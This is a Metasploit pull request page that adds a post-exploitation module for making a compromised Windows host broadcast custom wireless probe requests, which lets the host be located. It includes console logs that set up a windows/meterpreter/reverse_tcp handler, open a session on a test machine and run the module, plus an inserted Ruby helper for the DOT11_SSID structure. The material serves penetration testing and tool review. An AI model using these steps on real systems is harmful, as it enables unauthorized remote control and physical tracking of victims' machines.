
Post-exploitation module for meterpreter (Windows) to send wireless probe requests #9862

Merged: 1 commit merged on Apr 20, 2018

Conversation

BorjaMerino (Contributor)

The module sends probe request packets through the wlan interfaces. The user can configure the message to be sent (embedded in the SSID field) with a max length of 32 bytes and the time spent in seconds sending those packets (considering a sleep of 10 seconds between each probe request).

The module borrows most of its code from the @thelightcosine wlan_* modules (everything revolves around the wlanscan API and the DOT11_SSID structure).

I did this module because in a physical pentest I needed to know if I was close to the "victim host"; post/multi/manage/play_youtube is not a very stealthy option :). It could be useful for similar scenarios: to check wireless IDS countermeasures, to coordinate various actions with the team, etc.

Verification

msf5 > use post/windows/wlan/wlan_probe_request 
msf5 post(windows/wlan/wlan_probe_request) > set verbose true
verbose => true
msf5 post(windows/wlan/wlan_probe_request) > set SSID "are you around?"
SSID => are you around?
msf5 post(windows/wlan/wlan_probe_request) > set timeout 300
timeout => 300
msf5 post(windows/wlan/wlan_probe_request) > set session 1
session => 1
msf5 post(windows/wlan/wlan_probe_request) > run

[*] Wlan interfaces found: 1
[*] Sending probe requests for 300 seconds
[*] Interface Guid: 924b1d4a308ed74fab6b85c9dcb484a7
[*] Interface State: The interface is connected to a network.
[*] DOT11_SSID payload: f:0:0:0:61:72:65:20:79:6f:75:20:61:72:6f:75:6e:64:3f
[*] Interface Guid: 924b1d4a308ed74fab6b85c9dcb484a7
[*] Interface State: The interface is connected to a network.
[*] DOT11_SSID payload: f:0:0:0:61:72:65:20:79:6f:75:20:61:72:6f:75:6e:64:3f

To read the probe requests remember to set the wlan interface in monitor mode. Example: https://twitter.com/BorjaMerino/status/984044030534324224
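Added example, not code from the PR or from Metasploit: it packs a message into the DOT11_SSID layout the module fills in (a 4-byte little-endian uSSIDLength followed by a 32-byte ucSSID field) and decodes the colon-separated hex dump that the verbose output above prints, so a reviewer can check that the length prefix and the 32-byte limit are honoured.

```ruby
# Added example (not part of the PR's module code): packing and decoding the
# DOT11_SSID structure used with WlanScan. Layout from windot11.h:
# ULONG uSSIDLength (4 bytes, little endian) followed by UCHAR ucSSID[32].
DOT11_SSID_MAX_LENGTH = 32

# Build the full 36-byte DOT11_SSID struct carrying +message+ in the SSID
# field; messages longer than 32 bytes are rejected rather than truncated.
def pack_dot11_ssid(message)
  bytes = message.b
  if bytes.bytesize > DOT11_SSID_MAX_LENGTH
    raise ArgumentError, "SSID must be at most #{DOT11_SSID_MAX_LENGTH} bytes"
  end
  [bytes.bytesize].pack('V') + bytes.ljust(DOT11_SSID_MAX_LENGTH, "\x00")
end

# Render a struct the way the module's verbose output does: one hex byte per
# field separated by colons, length prefix first, with no zero padding shown.
def payload_dump(message)
  packed = pack_dot11_ssid(message)
  len = packed[0, 4].unpack('V').first
  packed[0, 4 + len].bytes.map { |b| b.to_s(16) }.join(':')
end

# Decode a colon-separated dump back into the message, checking that the
# length prefix matches the SSID bytes that follow and stays within 32.
def decode_payload_dump(dump)
  bytes = dump.split(':').map { |h| Integer(h, 16) }
  raise ArgumentError, 'dump shorter than the 4-byte length prefix' if bytes.size < 4
  len = bytes[0, 4].pack('C*').unpack('V').first
  ssid = bytes[4..-1]
  unless len == ssid.size
    raise ArgumentError, "length prefix #{len} does not match #{ssid.size} SSID bytes"
  end
  raise ArgumentError, "SSID length #{len} exceeds #{DOT11_SSID_MAX_LENGTH}" if len > DOT11_SSID_MAX_LENGTH
  ssid.pack('C*').force_encoding('UTF-8')
end

if __FILE__ == $PROGRAM_NAME
  puts payload_dump('are you around?')
  # Dump copied from the verification output above.
  puts decode_payload_dump('f:0:0:0:61:72:65:20:79:6f:75:20:61:72:6f:75:6e:64:3f')
end
```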

@bwatters-r7 (Contributor)

Testing

msf exploit(ms17_010_eternalblue) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf exploit(handler) > set lport 4567
lport => 4567
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.135.111:4567 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 192.168.135.157
[*] Meterpreter session 1 opened (192.168.135.111:4567 -> 192.168.135.157:50661) at 2018-04-20 13:20:34 -0500

meterpreter > sysinfo
Computer        : WIN10X64-1703
OS              : Windows 10 (Build 15063).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/wlan/wlan_probe_request 
msf post(wlan_probe_request) > set ssid "TEST"
ssid => TEST
msf post(wlan_probe_request) > set timeout 300
timeout => 300
msf post(wlan_probe_request) > set session 1
session => 1
msf post(wlan_probe_request) > run

[*] Wlan interfaces found: 1
[*] Sending probe requests for 300 seconds
^C[-] Post interrupted by the console user
[*] Post module execution completed
msf post(wlan_probe_request) > 

tmoose@ubuntu:~$ sudo python probemon.py -t unix -i mon0 -s -r -l | grep TEST
1524248955	74:ea:3a:8e:a1:6d	TEST	-59
1524248955	74:ea:3a:8e:a1:6d	TEST	-73
1524248955	74:ea:3a:8e:a1:6d	TEST	-63
1524248955	74:ea:3a:8e:a1:6d	TEST	-68
1524248956	74:ea:3a:8e:a1:6d	TEST	-74
1524248965	74:ea:3a:8e:a1:6d	TEST	-59
1524248965	74:ea:3a:8e:a1:6d	TEST	-60
1524248965	74:ea:3a:8e:a1:6d	TEST	-74
1524248965	74:ea:3a:8e:a1:6d	TEST	-73
1524248965	74:ea:3a:8e:a1:6d	TEST	-63
1524248965	74:ea:3a:8e:a1:6d	TEST	-63
1524248965	74:ea:3a:8e:a1:6d	TEST	-78
^C
[ruby-2.3.1]tmoose@ubuntu:~$ 

@bwatters-r7 bwatters-r7 merged commit 2d33320 into rapid7:master Apr 20, 2018
bwatters-r7 added a commit that referenced this pull request Apr 20, 2018
…d wireless probe requests

Merge branch 'land-9862' into upstream-master
@bwatters-r7 (Contributor) commented Apr 20, 2018

Release Notes

The new post/windows/wlan/wlan_probe_request module enables you to cause a compromised machine's wireless card to broadcast a specific SSID, allowing geolocation on a small scale.

msjenkins-r7 pushed a commit that referenced this pull request Apr 23, 2018
…d wireless probe requests

Merge branch 'land-9862' into upstream-master
@BorjaMerino (Contributor, Author)

@bwatters-r7 if it's not too much trouble, could you change the author field? It does not matter much, but I forgot to put the name:

'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',

Thank you.

@allrosenthal-r7 allrosenthal-r7 added the rn-enhancement release notes enhancement label May 1, 2018